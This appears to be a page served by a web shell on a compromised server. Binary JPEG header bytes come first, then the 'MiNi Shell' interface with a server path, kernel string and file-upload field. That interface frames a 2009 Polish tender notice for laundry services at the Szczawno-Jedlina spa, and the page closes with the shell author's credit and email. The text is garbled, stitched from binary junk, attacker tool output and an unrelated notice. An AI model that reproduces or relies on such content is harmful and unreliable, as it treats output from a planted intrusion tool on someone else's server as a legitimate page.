JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090312/59190-N-2009.html

<p class="kh_header"><b>Szczawno Zdrój: Usługi pralnicze dla Uzdrowiska Szczawno-Jedlina S.A.</b><br>
<b>Numer ogłoszenia: 59190 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Ratuszowa 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 074 8493201, faks 074 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi pralnicze dla Uzdrowiska Szczawno-Jedlina S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Świadczenie usług pralniczych dla Uzdrowiska Szczawno-Jedlina S.A.

Planowana ilość materiału przeznaczona do prania w okresie jednego miesiąca - ok. 4.180 kg.
Wszelkie koszty usługi tj. transport materiałów z/do magazynów Zamawiającego, załadunek, rozładunek, opakowanie (jednorazowe worki z tworzywa sztucznego) na czas transportu, pakowanie materiałów wypranych, ubezpieczenie - ponosi Wykonawca.
2. Struktura prania:
Dla Zadania nr 1 (przeciętnie) - 85% mat. Gr. I, 15% mat Gr. II,
Dla Zadania nr 2 (przeciętnie) - 90% fartuchy, 10% pozostałe.
3. Środki piorące, odplamiacze i płyny do płukania:
-	muszą być dopuszczone do stosowania zgodnie z Ustawą z 11.01.2001 r. o substancjach
i preparatach chemicznych,
-	posiadają atest i pozytywną opinię Państwowego Zakładu Higieny,
-	muszą być bezzapachowe, antyalergiczne, antyelektrostatyczne,
-	mają właściwości dezynfekcyjne (np. Steriwash, Eltra, Ozonit),
-	nie spowodują utraty istotnych cech pranych materiałów - m.in. po wypraniu koce muszą być miękkie i puszyste, pierze w poduszkach i kołdrach musi zostać poddane dodatkowej dezynfek-cji i nie może być zbite.
4. Organizacja:
Materiały przeznaczone do prania będą odbierane przez Wykonawcę z magazynów Zamawiającego
w przeciągu 24 godz. od momentu zgłoszenia przez przedstawiciela Zamawiającego potrzeby dokonania usługi prania.
Wyprane materiały zwracane będą do magazynów, z których zostały pobrane. Czas wykonania usługi - od odbioru materiałów przeznaczonych do prania do zwrotu wypranych materiałów, nie dłuższy niż 48 godzin.

Odbiory będą dokonywane na podstawie protokołów zdawczo-odbiorczych zawierających co najmniej:
-	ilość materiałów do prania i po wypraniu - w sztukach i w kg,
-	stwierdzone różnice,
-	uwagi dotyczące jakości usługi.
Wykonana usługa będzie rozliczana na podstawie ilości (kg) materiałów przeznaczonych do prania, ode-branych przez Wykonawcę z magazynów Zamawiającego.
Wyprane materiały być dobrze wysuszone, posortowane wg funkcji, poskładane i pakowane w jednora-zowe worki z tworzywa sztucznego zgodnie z zasadami sanitarno-higienicznymi.
Dodatkowo materiały muszą zostać trwale oznakowane w sposób indywidualny dla poszczególnych obiektów, dla których wykonywana będzie usługa prania, nićmi kolorowymi niefarbującymi w miejscach ogólnie niewidocznych. Szczegóły oznakowania dla poszczególnych obiektów zostaną ustalone na spo-tkaniu organizacyjnym z wybranym Wykonawcą.

Wymagania stawiane Wykonawcy:
- Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia,
- wymagana jest należyta staranność przy realizacji zobowiązań umowy,
- ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego
z ustanowionym przedstawicielem Wykonawcy,
- określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń nie-zbędnych dla sprawnego i terminowego wykonania zamówienia,
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
5.	Lokalizacje magazynów w obiektach:
Lokalizacja magazynów, w których odbywać się będzie wydawanie brudnego materiału oraz odbiór po praniu został podany w punkcie III.1 niniejszej SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.
O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamó-wienia;
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Niepodlegający wykluczeniu z postępowania o udzielenie zamówienia.
1.5 W okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - to w tym okre-sie) Wykonawca wykonał co najmniej 2 usługi o charakterze i w zakresie (wartościowym
i przedmiotowym) zbliżonym do przedmiotu zamówienia.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, o których mowa w art. 24 ustawy Prawo Zamówień publicznych.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu
o informacje zawarte w oświadczeniach lub dokumentach wyszczególnionych w pkt. X niniejszej SIWZ.
Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.
Niespełnienie chociażby jednego z opisanych warunków skutkować będzie wykluczeniem Wykonawcy
z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiada-nych uprawnień do wykonania określonej działalności lub czynności związanych z przedmio-tem zamówienia:
1) Wymagane oświadczenia Wykonawcy zgodnie ze wzorem - Załącznik nr 1 do oferty (Załącznik nr 4 do SIWZ).
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działal-ności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewi-dencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem termi-nu składania ofert - Załącznik nr 2 do oferty.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Pol-skiej zamiast w/w dokumentu składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania zgodnie z przepisami § 2 Rozporządzenia Prezesa Rady Mi-nistrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605).
3) Certyfikat dopuszczenia wydany przez Państwową Stację Sanitarno-Epidemiologiczną w zakresie realizacji Zadania nr 2 - Załącznik nr 3 do oferty.
4) Wykaz środków pralniczych-chemicznych, które będą użyte do wykonania zamówienia wraz
z atestami, certyfikatami, badaniami i dopuszczeniem do obrotu lub innymi niezbędnymi doku-mentami wymaganymi przez stosowne przepisy i normy odnośnie środków chemicznych używa-nych przez Wykonawcę - Załącznik nr 4 do oferty.
5) Aktualne zaświadczenie/opinia Powiatowego Inspektora Sanitarnego dopuszczająca pralnię do funkcjonowania wystawiona nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert - Załącznik nr 5 do oferty.
6) Aktualna decyzja/opinia Powiatowego Inspektora Sanitarnego dopuszczająca pojazd do transpor-tu pościeli, bielizny i odzieży szpitalnej wystawiona nie wcześniej nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert - Załącznik nr 6 do oferty.
7) Opis technologii prania (od rozpakowania przywiezionego prania do przygotowania prania do wy-wozu) stosowanej w zakładzie pralniczym Wykonawcy - Załącznik nr 7 do oferty.

B. dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiada-nia niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia:
1) Wykaz dokonanych usług (co najmniej 2 usługi), o charakterze zbliżonym do przedmiotu zamó-wienia, które Wykonawca wykonał w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działal-ności jest krótszy - to w tym okresie) i wartości nie mniejszej niż 150 tyś zł każda wraz z załączo-nymi dokumentami potwierdzającymi ich staranne wykonanie - Załącznik nr 8 do oferty.

C. dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
1) Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpie-czenia nie mniejszą jak 200.000,00 zł (słownie: dwieście tysięcy 00/100 zł) - Załącznik nr 9 do oferty.

D. inne wymagane, niezbędne dokumenty w toku oceny i badania ofert:
1) Zaparafowany projekt umowy - Załącznik nr 10 do oferty (Załącznik nr 3 do SIWZ).
2) Pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważ-niona do reprezentowania Wykonawcy z mocy prawa - Załącznik nr 11 do oferty.
3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówie-nia albo do reprezentowania w postępowaniu o zawarcie umowy w sprawie zamówienia publicz-nego, zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych - Załącznik nr 12 do oferty.

Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed za-warciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, z treści której wynika iż odpowiadają solidarnie za zobowiązania, wskazują lidera konsorcjum. Każdy
z uczestników konsorcjum winien załączyć do oferty dokumenty wskazane w pkt. A1, A2, C1 z tym, że polisa może być wystawiona łącznie dla wszystkich Wykonawców.
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgod-ność z oryginałem.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczo-nym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko.szczawno-jedlina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno-Jedlina S.A., ul. Ratuszowa1, 58-310 Szczawno Zdrój.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2009 godzina 10:00, miejsce: Uzdrowisko Szczawno-Jedlina S.A., ul. Ratuszowa1, 58-310 Szczawno Zdrój, Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług pralniczych dla Uzdrowiska Szczawno-Jedlina S.A..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres usługi:
Dla Zadania nr 1 usługi pralnicze świadczone dla następujących obiektów:
Obiekty w Szczawnie Zdroju:
a)	Sanatorium Dom Zdrojowy,  ul. Kolejowa 14;
b)	Sanatorium Zacisze,  ul. Okrężna 5;
c)	Sanatorium Zuch,  ul. Sienkiewicza 10;
d)	Sanatorium Korona Piastowska,  ul. Wojska Polskiego 1;
e)	Sanatorium Cis,  ul. Sienkiewicza 5;
f)	Sanatorium Mieszko,  ul. Wojska Polskiego 4;
g)	Sanatorium Młynarz,  ul. Wojska Polskiego 3;
h)	Sanatorium Dąbrówka,  ul. Wojska Polskiego 5;
i)	Sanatorium Anka,  ul. Wojska Polskiego 6;
j)	Sanatorium Pionier,  ul. Potockiego 4;
k)	Zakład Przyrodoleczniczy,  ul. Sienkiewicza 1;
l)	Budynek Dyrekcji,  ul. Ratuszowa 1.
Obiekty w Jedlinie Zdroju:
a)	Punkt Żywienia,  Plac Zdrojowy 4;
b)	Sanatorium Teresa,  Plac Zdrojowy 8;
c)	Sanatorium Warszawianka,  Plac Zdrojowy 3.

Planowana ilość materiału przeznaczona do prania w okresie jednego miesiąca - ok. 4.180 kg.
Rodzaje materiałów podano w poniższej tabeli:

Grupa	Czynność
    
Funkcja
Materiału	pranie wodne
i dezynfekcja	gotowanie	krochmalenie	maglowanie	prasowanie
I	ręczniki hotelowe	x	x		x	
	pościel - 
poszwa, poszewka na poduszkę, prześcieradło	x	x	x
(wg właściwości
materiału)	x
(wg właściwości
materiału)	
	obrusy	x		x
lekkie
krochmalenie	x	
	serwetki	x		x
lekkie
krochmalenie	x	



	inne nakrycia (tworzywa sztuczne)	x
+ czyszczenie
chemiczne				
II	zasłony (małe, duże)	x		x
lekkie
krochmalenie	x	
	firany	x		x
lekkie
krochmalenie	x	
	ścierki	x	x		x	
	fartuchy	x	x			x
	zasłony dla sanatorium Teresa	x
+ impregnacja
ogniochronna				
Wszelkie koszty usługi tj. transport materiałów z/do magazynów Zamawiającego, załadunek, rozładunek, opakowanie (jednorazowe worki z tworzywa sztucznego) na czas transportu, pakowanie materiałów wypranych, ubezpieczenie - ponosi Wykonawca.
2. Struktura prania:
Dla Zadania nr 1 (przeciętnie) - 85% mat. Gr. I, 15% mat Gr. II,
3. Środki piorące, odplamiacze i płyny do płukania:
-	muszą być dopuszczone do stosowania zgodnie z Ustawą z 11.01.2001 r. o substancjach
i preparatach chemicznych,
-	posiadają atest i pozytywną opinię Państwowego Zakładu Higieny,
-	muszą być bezzapachowe, antyalergiczne, antyelektrostatyczne,
-	mają właściwości dezynfekcyjne (np. Steriwash, Eltra, Ozonit),
-	nie spowodują utraty istotnych cech pranych materiałów - m.in. po wypraniu koce muszą być miękkie i puszyste, pierze w poduszkach i kołdrach musi zostać poddane dodatkowej dezynfek-cji i nie może być zbite.
4. Organizacja:
Materiały przeznaczone do prania będą odbierane przez Wykonawcę z magazynów Zamawiającego
w przeciągu 24 godz. od momentu zgłoszenia przez przedstawiciela Zamawiającego potrzeby dokonania usługi prania.
Wyprane materiały zwracane będą do magazynów, z których zostały pobrane. Czas wykonania usługi - od odbioru materiałów przeznaczonych do prania do zwrotu wypranych materiałów, nie dłuższy niż 48 godzin.

Odbiory będą dokonywane na podstawie protokołów zdawczo-odbiorczych zawierających co najmniej:
-	ilość materiałów do prania i po wypraniu - w sztukach i w kg,
-	stwierdzone różnice,
-	uwagi dotyczące jakości usługi.
Wykonana usługa będzie rozliczana na podstawie ilości (kg) materiałów przeznaczonych do prania, ode-branych przez Wykonawcę z magazynów Zamawiającego.
Wyprane materiały być dobrze wysuszone, posortowane wg funkcji, poskładane i pakowane w jednora-zowe worki z tworzywa sztucznego zgodnie z zasadami sanitarno-higienicznymi.
Dodatkowo materiały muszą zostać trwale oznakowane w sposób indywidualny dla poszczególnych obiektów, dla których wykonywana będzie usługa prania, nićmi kolorowymi niefarbującymi w miejscach ogólnie niewidocznych. Szczegóły oznakowania dla poszczególnych obiektów zostaną ustalone na spo-tkaniu organizacyjnym z wybranym Wykonawcą.

Wymagania stawiane Wykonawcy:
- Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia,
- wymagana jest należyta staranność przy realizacji zobowiązań umowy,
- ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego
z ustanowionym przedstawicielem Wykonawcy,
- określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń nie-zbędnych dla sprawnego i terminowego wykonania zamówienia,
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
5.	Lokalizacje magazynów w obiektach:
Lokalizacja magazynów, w których odbywać się będzie wydawanie brudnego materiału oraz odbiór po praniu został podany w punkcie III.1 niniejszej SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług pralniczych dla Uzdrowiska Szczawno-Jedlina S.A..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla Zadania nr 2 usługi pralnicze świadczone dla następującego obiektu:
a)	Laboratorium analityczne,  ul. Sienkiewicza 5,  58-310 Szczawno Zdrój.

Planowana ilość materiału przeznaczona do prania w okresie jednego miesiąca - ok. 10 kg.
Rodzaje materiałów podano w poniższej tabeli:

Grupa	Czynność
    
Funkcja
Materiału	pranie wodne
i dezynfekcja	gotowanie	krochmalenie	maglowanie	prasowanie
I	obrusy 	x		x
lekkie
krochmalenie	x	
	serwetki	x		x
lekkie
krochmalenie	x	
II	zasłony (małe, duże)	x		x
lekkie
krochmalenie	x	
	firany	x		x
lekkie
krochmalenie	x	
	ścierki	x	x		x	
	fartuchy	x	x			x

Wszelkie koszty usługi tj. transport materiałów z/do magazynów Zamawiającego, załadunek, rozładunek, opakowanie (jednorazowe worki z tworzywa sztucznego) na czas transportu, pakowanie materiałów wypranych, ubezpieczenie - ponosi Wykonawca.
2. Struktura prania:
Dla Zadania nr 2 (przeciętnie) - 90% fartuchy, 10% pozostałe.
3. Środki piorące, odplamiacze i płyny do płukania:
-	muszą być dopuszczone do stosowania zgodnie z Ustawą z 11.01.2001 r. o substancjach
i preparatach chemicznych,
-	posiadają atest i pozytywną opinię Państwowego Zakładu Higieny,
-	muszą być bezzapachowe, antyalergiczne, antyelektrostatyczne,
-	mają właściwości dezynfekcyjne (np. Steriwash, Eltra, Ozonit),
-	nie spowodują utraty istotnych cech pranych materiałów - m.in. po wypraniu koce muszą być miękkie i puszyste, pierze w poduszkach i kołdrach musi zostać poddane dodatkowej dezynfek-cji i nie może być zbite.
4. Organizacja:
Materiały przeznaczone do prania będą odbierane przez Wykonawcę z magazynów Zamawiającego
w przeciągu 24 godz. od momentu zgłoszenia przez przedstawiciela Zamawiającego potrzeby dokonania usługi prania.
Wyprane materiały zwracane będą do magazynów, z których zostały pobrane. Czas wykonania usługi - od odbioru materiałów przeznaczonych do prania do zwrotu wypranych materiałów, nie dłuższy niż 48 godzin.

Odbiory będą dokonywane na podstawie protokołów zdawczo-odbiorczych zawierających co najmniej:
-	ilość materiałów do prania i po wypraniu - w sztukach i w kg,
-	stwierdzone różnice,
-	uwagi dotyczące jakości usługi.
Wykonana usługa będzie rozliczana na podstawie ilości (kg) materiałów przeznaczonych do prania, ode-branych przez Wykonawcę z magazynów Zamawiającego.
Wyprane materiały być dobrze wysuszone, posortowane wg funkcji, poskładane i pakowane w jednora-zowe worki z tworzywa sztucznego zgodnie z zasadami sanitarno-higienicznymi.
Dodatkowo materiały muszą zostać trwale oznakowane w sposób indywidualny dla poszczególnych obiektów, dla których wykonywana będzie usługa prania, nićmi kolorowymi niefarbującymi w miejscach ogólnie niewidocznych. Szczegóły oznakowania dla poszczególnych obiektów zostaną ustalone na spo-tkaniu organizacyjnym z wybranym Wykonawcą.

Wymagania stawiane Wykonawcy:
- Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia,
- wymagana jest należyta staranność przy realizacji zobowiązań umowy,
- ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego
z ustanowionym przedstawicielem Wykonawcy,
- określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń nie-zbędnych dla sprawnego i terminowego wykonania zamówienia,
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
5.	Lokalizacje magazynów w obiektach:
Lokalizacja magazynów, w których odbywać się będzie wydawanie brudnego materiału oraz odbiór po praniu został podany w punkcie III.1 niniejszej SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com